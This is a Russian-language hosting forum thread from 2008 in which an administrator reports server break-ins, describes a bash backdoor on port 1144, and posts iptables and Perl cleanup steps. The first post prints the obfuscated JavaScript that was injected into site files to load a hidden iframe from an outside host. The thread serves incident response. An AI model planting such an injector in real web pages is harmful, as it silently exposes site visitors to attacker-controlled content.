Главная Статьи Форум Помощь Блоги Инструменты Контакты

Здравствуйте, гость ( Вход | Регистрация )

> Эпидемия руткитов
kit
сообщение 24.10.2008, 0:25
Сообщение #1


Активный участник
***

Группа: Главные администраторы
Сообщений: 39
Регистрация: 22.9.2008
Пользователь №: 2



За последние несколько дней произошёл ряд взломов серверов. Ломают непонятно через что, но с единственной целью - залить на все php html htm файлы скрипт с фреймом. Скрипт выглядит примерно так

Код
<script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>


Проявляется в появлении на страницах фрейма либо ошибками в закодированных скриптах. Зазенденные файлы говорят примерно такое
Код
Fatal error: Incompatible file format: The encoded file has format ID 0, which is too old in /path/to/script.php on line 0


На самом сервере видно, что биндится bash на порт 1144 и слушает команды. Для этого используется файл /sbin/misc, там же лежит /sbin/shs с битом suid. Возможно, есть ещё что-то. После заражения удаляются все логи, поэтому определить кто и что не представляется возможным. Все заражённые файлы меняют владельца на root.

Пока зарегистрированны взломы только CentOS, но, возможно, это только совпадение.
Неясно, также, эксплутируется ли сетевая уязвимость или через какой-то скрипт/сервис заливается руткит который затем получает привилегии рута. Есть также вариант что у всех пострадавших увели пароли. Если подтвердится, что уязвимости подвержен только CentOS - я склоняюсь к первому варианту.

Пока пострадавшим можно делать так:

Код
iptables -A INPUT -s YOUR_IP -p tcp -m tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 22 -j DROP
iptables -A INPUT -p tcp -m tcp --dport 1144 -j DROP
/etc/init.d/iptables save
kill -9 `netstat -lnp|grep bash|sed "s/.*LISTEN//"|cut -f1 -d/`
chmod 000 /sbin/misc
mv /sbin/misc /sbin/misc.hck
chattr -aui /sbin/shs
chmod 000 /sbin/shs
mv /sbin/shs /sbin/shs.hck
cat > ant.pl << EOF
#!/usr/bin/perl
\$/=\n;
open F, "<\$ARGV[0]";
\$mass=<F>; close F;
\$mass=~ s! <html> <body><script>var source.*</html> </body>!!s;
open F, ">\$ARGV[0]"; print F \$mass; close F;
EOF
chmod u+x ant.pl
find /home/ -regextype posix-extended -regex '.*\.php|.*\.s?html?' -exec grep -l '<html> <body><script>var source' {} \; >/root/virlist
while read i; do ./ant.pl $i; echo $i; done < /root/virlist

YOUR_IP - это ваш IP с которого будете заходить в шелл. Можно выполнить несколько таких команд с разными IP если к серверу нужен доступ с разных адресов (например для админов хостинга).

Паттерн скрипта вполне может быть и другой, например <html> <body> без пробела между ними и или </html> и </body> поменяны местами. Т.е. если не помогает то, что я написал - открываете любой php или html файл и смотрите что там есть.

Команды
Код
iptables -A INPUT -s YOUR_IP -p tcp -m tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 22 -j DROP
iptables -A INPUT -p tcp -m tcp --dport 1144 -j DROP
/etc/init.d/iptables save

рекомендую выполнить всем счастливым обладателям линуксов и постоянных IP(или хотя бы зараннее известного диапазона IP провайдера), независимо от заражения.


--------------------
Перейти в начало страницы
 
+Цитировать сообщение
 
Начать новую тему
Ответов
kit
сообщение 24.10.2008, 12:40
Сообщение #2


Активный участник
***

Группа: Главные администраторы
Сообщений: 39
Регистрация: 22.9.2008
Пользователь №: 2



Появились взломы дебиана. cups был при этом был отключен. Заход, похоже, с первой попытки по ssh (лог auth.log остался, но может его и подправили). Или увели пароль или уязвимость в ssh.


--------------------
Перейти в начало страницы
 
+Цитировать сообщение
awa
сообщение 24.10.2008, 12:42
Сообщение #3


Новичок
*

Группа: Пользователи
Сообщений: 2
Регистрация: 24.10.2008
Пользователь №: 12



Цитата(kit @ 24.10.2008, 12:40) *
Появились взломы дебиана. cups был при этом был отключен. Заход, похоже, с первой попытки по ssh (лог auth.log остался, но может его и подправили). Или увели пароль или уязвимость в ssh.

Вообще у меня есть подозрение, что именно уводят пароль или заходят без пароля - у одного из наших сотрудников была привычка хранить у себя ключи и заходить рутом в один клик, лень пароли вводить.
Перейти в начало страницы
 
+Цитировать сообщение



Ответить в данную темуНачать новую тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 

RSS Текстовая версия Сейчас: 19.8.2026, 0:24
© 2005-2009 AMhost.net All Rights Reserved.
Главная Статьи Форум Помощь Блоги
Инструменты Контакты